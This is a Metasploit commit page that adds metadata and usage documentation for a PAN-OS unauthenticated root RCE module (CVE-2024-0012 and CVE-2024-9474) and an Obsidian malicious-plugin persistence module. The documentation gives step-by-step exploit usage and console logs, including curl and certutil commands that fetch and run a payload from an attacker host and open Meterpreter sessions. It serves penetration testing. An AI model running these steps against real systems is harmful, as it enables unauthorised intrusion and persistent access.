Skip to content

Commit

Permalink
Merge remote-tracking branch 'upstream/master'
Browse files Browse the repository at this point in the history
  • Loading branch information
certcc-ghbot committed Dec 30, 2024
2 parents 1f3101d + 22c1697 commit b746db5
Show file tree
Hide file tree
Showing 7 changed files with 867 additions and 2 deletions.
3 changes: 2 additions & 1 deletion Gemfile.lock
View file
Original file line number Diff line number Diff line change
Expand Up @@ -446,7 +446,8 @@ GEM
metasm
rex-core
rex-text
rex-socket (0.1.57)
rex-socket (0.1.58)
dnsruby
rex-core
rex-sslscan (0.1.10)
rex-core
Expand Down
127 changes: 127 additions & 0 deletions db/modules_metadata_base.json
View file
Original file line number Diff line number Diff line change
Expand Up @@ -80696,6 +80696,69 @@
"session_types": false,
"needs_cleanup": null
},
"exploit_linux/http/panos_management_unauth_rce": {
"name": "Palo Alto Networks PAN-OS Management Interface Unauthenticated Remote Code Execution",
"fullname": "exploit/linux/http/panos_management_unauth_rce",
"aliases": [

],
"rank": 600,
"disclosure_date": "2024-11-18",
"type": "exploit",
"author": [
"watchTowr",
"sfewer-r7"
],
"description": "This module exploits an authentication bypass vulnerability (CVE-2024-0012) and a command injection\n vulnerability (CVE-2024-9474) in the PAN-OS management web interface. An unauthenticated attacker can\n execute arbitrary code with root privileges.\n\n The following versions are affected:\n * PAN-OS 11.2 (up to and including 11.2.4-h1)\n * PAN-OS 11.1 (up to and including 11.1.5-h1)\n * PAN-OS 11.0 (up to and including 11.0.6-h1)\n * PAN-OS 10.2 (up to and including 10.2.12-h2)",
"references": [
"CVE-2024-0012",
"CVE-2024-9474",
"URL-https://security.paloaltonetworks.com/CVE-2024-0012",
"URL-https://security.paloaltonetworks.com/CVE-2024-9474",
"URL-https://labs.watchtowr.com/pots-and-pans-aka-an-sslvpn-palo-alto-pan-os-cve-2024-0012-and-cve-2024-9474/"
],
"platform": "Linux,Unix",
"arch": "cmd",
"rport": 443,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Default"
],
"mod_time": "2024-12-17 17:47:00 +0000",
"path": "/modules/exploits/linux/http/panos_management_unauth_rce.rb",
"is_install_path": true,
"ref_name": "linux/http/panos_management_unauth_rce",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
"Stability": [
"crash-safe"
],
"Reliability": [
"repeatable-session"
],
"SideEffects": [
"ioc-in-logs"
]
},
"session_types": false,
"needs_cleanup": null
},
"exploit_linux/http/panos_op_cmd_exec": {
"name": "Palo Alto Networks Authenticated Remote Code Execution",
"fullname": "exploit/linux/http/panos_op_cmd_exec",
Expand Down Expand Up @@ -118923,6 +118986,70 @@

]
},
"exploit_multi/local/obsidian_plugin_persistence": {
"name": "Obsidian Plugin Persistence",
"fullname": "exploit/multi/local/obsidian_plugin_persistence",
"aliases": [

],
"rank": 600,
"disclosure_date": "2022-09-16",
"type": "exploit",
"author": [
"h00die",
"Thomas Byrne"
],
"description": "This module searches for Obsidian vaults for a user, and uploads a malicious\n community plugin to the vault. The vaults must be opened with community\n plugins enabled (NOT restricted mode), but the plugin will be enabled\n automatically.\n\n Tested against Obsidian 1.7.7 on Kali, Ubuntu 22.04, and Windows 10.",
"references": [
"URL-https://docs.obsidian.md/Plugins/Getting+started/Build+a+plugin",
"URL-https://github.com/obsidianmd/obsidian-sample-plugin/tree/master",
"URL-https://forum.obsidian.md/t/can-obsidian-plugins-have-malware/34491",
"URL-https://help.obsidian.md/Extending+Obsidian/Plugin+security",
"URL-https://thomas-byrne.co.uk/research/obsidian-malicious-plugins/obsidian-research/"
],
"platform": "Linux,OSX,Windows",
"arch": "cmd",
"rport": null,
"autofilter_ports": [

],
"autofilter_services": [

],
"targets": [
"Auto",
"Linux",
"OSX",
"Windows"
],
"mod_time": "2024-12-14 17:38:29 +0000",
"path": "/modules/exploits/multi/local/obsidian_plugin_persistence.rb",
"is_install_path": true,
"ref_name": "multi/local/obsidian_plugin_persistence",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
"Reliability": [
"repeatable-session"
],
"Stability": [
"crash-safe"
],
"SideEffects": [
"artifacts-on-disk",
"config-changes"
]
},
"session_types": [
"shell",
"meterpreter"
],
"needs_cleanup": null,
"actions": [

]
},
"exploit_multi/local/vagrant_synced_folder_vagrantfile_breakout": {
"name": "Vagrant Synced Folder Vagrantfile Breakout",
"fullname": "exploit/multi/local/vagrant_synced_folder_vagrantfile_breakout",
Expand Down
2 changes: 1 addition & 1 deletion docs/Gemfile.lock
View file
Original file line number Diff line number Diff line change
Expand Up @@ -76,7 +76,7 @@ GEM
rb-fsevent (0.11.2)
rb-inotify (0.11.1)
ffi (~> 1.0)
rexml (3.3.9)
rexml (3.4.0)
rouge (4.5.1)
safe_yaml (1.0.5)
sassc (2.4.0)
Expand Down
113 changes: 113 additions & 0 deletions documentation/modules/exploit/linux/http/panos_management_unauth_rce.md
View file
Original file line number Diff line number Diff line change
@@ -0,0 +1,113 @@
## Vulnerable Application
This module exploits an authentication bypass vulnerability (CVE-2024-0012) and a command injection
vulnerability (CVE-2024-9474) in the PAN-OS management web interface. An unauthenticated attacker can
execute arbitrary code with root privileges.

The following versions are affected:
* PAN-OS 11.2 (up to and including 11.2.4-h1)
* PAN-OS 11.1 (up to and including 11.1.5-h1)
* PAN-OS 11.0 (up to and including 11.0.6-h1)
* PAN-OS 10.2 (up to and including 10.2.12-h2)

## Testing
Install a new PAN-OS instance as a VM in VMWare, by downloading an OVA for a vulnerable version, for example
`PA-VM-ESX-11.1.4.ova`. Install this OVA in VMWare Workstation and boot the device. The first ethernet adapter
will be assigned an IP address via DHCP. This is the IP address of the management interface. You can complete setup
by visiting `https://MANAGEMENT_IP/` in your browser. You do not need to license the target VM in order to successfully
run the exploit against the target. The default user is `admin` with a password of `admin`, and you will be instructed
to change this upon logging in for the first time.

The exploit has been tested against PAN-OS `10.2.8` and `11.1.4`, with the
payloads `cmd/linux/http/x64/meterpreter_reverse_tcp`, `md/linux/http/x64/meterpreter/reverse_tcp`,
and `cmd/unix/reverse_bash`.

## Verification Steps

1. Start msfconsole
2. `use exploit/linux/http/panos_management_unauth_rce`
3. `set RHOST <TARGET_IP_ADDRESS>`
4. `set PAYLOAD cmd/linux/http/x64/meterpreter_reverse_tcp`
5. `set LHOST eth0`
5. `set LPORT 4444`
6. `check`
7. `exploit`

## Options

### WRITABLE_DIR
The full path of a writable directory on the target. By default it will be `/var/tmp`. The exploit will write the
payload as a series of chunks to this location, before executing the payload. The written artifacts are then deleted.

## Scenarios

### Default

```
msf6 exploit(linux/http/panos_management_unauth_rce) > show options
Module options (exploit/linux/http/panos_management_unauth_rce):
Name Current Setting Required Description
---- --------------- -------- -----------
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS 192.168.86.100 yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
RPORT 443 yes The target port (TCP)
SSL true no Negotiate SSL/TLS for outgoing connections
VHOST no HTTP server virtual host
WRITABLE_DIR /var/tmp yes The full path of a writable directory on the target.
Payload options (cmd/linux/http/x64/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET)
FETCH_DELETE false yes Attempt to delete the binary after execution
FETCH_FILENAME pHLZiKRnmfR no Name to use on remote system when storing payload; cannot contain spaces or slashes
FETCH_SRVHOST no Local IP to use for serving payload
FETCH_SRVPORT 8080 yes Local port to use for serving payload
FETCH_URIPATH no Local URI to use for serving payload
FETCH_WRITABLE_DIR /var/tmp yes Remote writable dir to store payload; cannot contain spaces
LHOST 192.168.86.42 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Default
View the full module info with the info, or info -d command.
msf6 exploit(linux/http/panos_management_unauth_rce) > check
[+] 192.168.86.100:443 - The target is vulnerable.
msf6 exploit(linux/http/panos_management_unauth_rce) > exploit
[*] Started reverse TCP handler on 192.168.86.42:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable.
[*] Uploading payload chunk 1 of 7...
[*] Uploading payload chunk 2 of 7...
[*] Uploading payload chunk 3 of 7...
[*] Uploading payload chunk 4 of 7...
[*] Uploading payload chunk 5 of 7...
[*] Uploading payload chunk 6 of 7...
[*] Uploading payload chunk 7 of 7...
[*] Amalgamating payload chunks...
[*] Executing payload...
[*] Sending stage (3045380 bytes) to 192.168.86.100
[*] Meterpreter session 1 opened (192.168.86.42:4444 -> 192.168.86.100:54266) at 2024-11-21 16:35:38 +0000
meterpreter > getuid
Server username: root
meterpreter > sysinfo
Computer : 192.168.86.100
OS : Red Hat (Linux 4.18.0-240.1.1.28.pan.x86_64)
Architecture : x64
BuildTuple : x86_64-linux-musl
Meterpreter : x64/linux
meterpreter >
```
124 changes: 124 additions & 0 deletions documentation/modules/exploit/multi/local/obsidian_plugin_persistence.md
View file
Original file line number Diff line number Diff line change
@@ -0,0 +1,124 @@
## Vulnerable Application

This module searches for Obsidian vaults for a user, and uploads a malicious
community plugin to the vault. The vaults must be opened with community
plugins enabled (NOT restricted mode), but the plugin will be enabled
automatically.

Tested against Obsidian 1.7.7 on Kali, Ubuntu 22.04, and Windows 10.

### Debugging

To open the console (similar to chrome), use `ctr+shift+i`.

## Verification Steps

1. Install the application
2. Start msfconsole
3. Get a user shell on the target
4. Do: `use multi/local/obsidian_plugin_persistence`
5. Do: Select a shell which will work on your target OS
6. Do: `run`
7. You should get a shell when the target user opens the vault without restricted mode.

## Options

### NAME

Name of the plugin. Defaults to being randomly generated.

### USER

The user to target. Defaults the user the shell was obtained under.

### CONFIG

Config file location on target. Defaults to empty which will search the default locations.

## Scenarios

### Version and OS

Get a user shell.

```
msf6 exploit(multi/script/web_delivery) > use exploit/multi/local/obsidian_plugin_persistence
[*] No payload configured, defaulting to cmd/linux/http/x64/meterpreter/reverse_tcp
msf6 exploit(multi/local/obsidian_plugin_persistence) > set session 1
session => 1
msf6 exploit(multi/local/obsidian_plugin_persistence) > set verbose true
verbose => true
msf6 exploit(multi/local/obsidian_plugin_persistence) > exploit
[*] Command to run on remote host: curl -so ./HvxtaAdZVc http://1.1.1.1:8080/aZRe4yWUN3U2-lDtdsaGlA; chmod +x ./HvxtaAdZVc; ./HvxtaAdZVc &
[*] Fetch handler listening on 1.1.1.1:8080
[*] HTTP server started
[*] Adding resource /aZRe4yWUN3U2-lDtdsaGlA
[*] Started reverse TCP handler on 1.1.1.1:4444
[*] Using plugin name: xQem
[*] Target User: ubuntu
[*] Found user obsidian file: /home/ubuntu/.config/obsidian/obsidian.json
[+] Found open vault 83ca6e5734f5dfc4: /home/ubuntu/Documents/test
[*] Uploading plugin to vault /home/ubuntu/Documents/test
[*] Uploading: /home/ubuntu/Documents/test/.obsidian/plugins/xQem/main.js
[*] Uploading: /home/ubuntu/Documents/test/.obsidian/plugins/xQem/manifest.json
[*] Found 1 enabled community plugins (sX2sv4)
[*] adding xQem to the enabled community plugins list
[+] Plugin enabled, waiting for Obsidian to open the vault and execute the plugin.
[*] Client 2.2.2.2 requested /aZRe4yWUN3U2-lDtdsaGlA
[*] Sending payload to 2.2.2.2 (curl/7.81.0)
[*] Transmitting intermediate stager...(126 bytes)
[*] Sending stage (3045380 bytes) to 2.2.2.2
[*] Meterpreter session 2 opened (1.1.1.1:4444 -> 2.2.2.2:49192) at 2024-12-05 10:19:32 -0500
meterpreter > getuid
Server username: ubuntu
meterpreter > sysinfo
Computer : 2.2.2.2
OS : Ubuntu 22.04 (Linux 5.15.0-60-generic)
Architecture : x64
BuildTuple : x86_64-linux-musl
Meterpreter : x64/linux
meterpreter >
```

### Obsidian 1.7.7 on Windows 10

```
msf6 exploit(multi/local/obsidian_plugin_persistence) > rexploit
[*] Reloading module...
[*] Command to run on remote host: certutil -urlcache -f http://1.1.1.1:8080/bXCLrS0dWKPwEfygT3FJNA %TEMP%\FDTcKUuwF.exe & start /B %TEMP%\FDTcKUuwF.exe
[*] Fetch handler listening on 1.1.1.1:8080
[*] HTTP server started
[*] Adding resource /bXCLrS0dWKPwEfygT3FJNA
[*] Started reverse TCP handler on 1.1.1.1:4444
[*] Using plugin name: pPq0K
[*] Target User: h00die
[*] Found user obsidian file: C:\Users\h00die\AppData\Roaming\obsidian\obsidian.json
[+] Found open vault 69172dadc065de73: C:\Users\h00die\Documents\vault
[*] Uploading plugin to vault C:\Users\h00die\Documents\vault
[*] Uploading: C:\Users\h00die\Documents\vault/.obsidian/plugins/pPq0K/main.js
[*] Uploading: C:\Users\h00die\Documents\vault/.obsidian/plugins/pPq0K/manifest.json
[*] Found 0 enabled community plugins ()
[*] adding pPq0K to the enabled community plugins list
[+] Plugin enabled, waiting for Obsidian to open the vault and execute the plugin.
[*] Client 3.3.3.3 requested /bXCLrS0dWKPwEfygT3FJNA
[*] Sending payload to 3.3.3.3 (Microsoft-CryptoAPI/10.0)
[*] Client 3.3.3.3 requested /bXCLrS0dWKPwEfygT3FJNA
[*] Sending payload to 3.3.3.3 (CertUtil URL Agent)
[*] Meterpreter session 7 opened (1.1.1.1:4444 -> 3.3.3.3:51369) at 2024-12-05 09:24:24 -0500
meterpreter > getuid
Server username: DESKTOP-3ASD0R4\h00die
meterpreter > sysinfo
Computer : DESKTOP-3ASD0R4
OS : Windows 10 (10.0 Build 19044).
Architecture : x64
System Language : en_US
Domain : WORKGROUP
Logged On Users : 2
Meterpreter : x64/windows
meterpreter >
```
Loading

0 comments on commit b746db5

Please sign in to comment.